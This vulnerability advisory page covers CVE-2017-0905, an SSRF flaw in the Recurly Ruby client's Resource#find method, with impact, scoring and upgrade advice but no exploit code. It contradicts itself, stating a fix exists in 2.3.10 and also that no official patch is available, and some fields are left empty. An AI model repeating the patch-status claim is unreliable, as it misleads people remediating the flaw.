Platform
ruby
Component
recurly
Fixed in
2.3.10
CVE-2017-0905 is a Server-Side Request Forgery (SSRF) vulnerability discovered in the Recurly Client Ruby Library. This flaw allows attackers to potentially trigger unintended requests to internal or external resources, leading to the compromise of sensitive data. The vulnerability affects versions of the library up to and including 2.3.9. A fix is available in version 2.3.10.
The SSRF vulnerability in the Recurly Client Ruby Library allows an attacker to craft malicious requests through the Resource#find method. This can be exploited to make the application send requests to arbitrary URLs, potentially exposing internal services or resources that should not be publicly accessible. A successful exploitation could lead to the leakage of API keys, authentication tokens, or other sensitive data used by the Recurly integration. The impact is particularly severe because Recurly is often used to manage subscription billing, making compromised API keys a direct pathway to financial data and user accounts. This vulnerability shares similarities with other SSRF exploits where attackers leverage internal network access to gain unauthorized information.
CVE-2017-0905 was publicly disclosed on December 6, 2017. While no active exploitation campaigns have been definitively linked to this vulnerability, SSRF vulnerabilities are frequently targeted. The CVSS score of 9.8 indicates a critical severity. There are publicly available proof-of-concept exploits demonstrating the SSRF vulnerability. This CVE is not currently listed on the CISA KEV catalog.
Exploit Status
EPSS
0.52% (67% percentile)
CVSS Vector
The primary mitigation for CVE-2017-0905 is to upgrade the Recurly Client Ruby Library to version 2.3.10 or later. If upgrading is not immediately feasible due to compatibility issues or breaking changes, consider implementing input validation on the Resource#find method to restrict the URLs that can be accessed. Additionally, restrict network access for the application to only the necessary resources. Implement a Web Application Firewall (WAF) with SSRF protection rules to block suspicious requests. After upgrading, confirm the fix by attempting to trigger the Resource#find method with an external URL and verifying that the request is blocked or redirected.
No official patch available. Check for workarounds or monitor for updates.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2017-0905 is a critical Server-Side Request Forgery vulnerability in the Recurly Client Ruby Library, allowing attackers to potentially access internal resources and compromise API keys.
You are affected if your Ruby application uses the Recurly Client Ruby Library version 2.3.9 or earlier. Upgrade to version 2.3.10 or later to mitigate the risk.
Upgrade the Recurly Client Ruby Library to version 2.3.10 or later. If upgrading is not possible immediately, implement input validation and restrict network access.
While no confirmed active exploitation campaigns are publicly known, SSRF vulnerabilities are frequently targeted, making proactive mitigation essential.
Refer to the Recurly security advisory for detailed information and updates: https://www.recurly.com/security/advisories/recurly-client-ssrf/
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.
Upload your Gemfile.lock file and we'll tell you instantly if you're affected.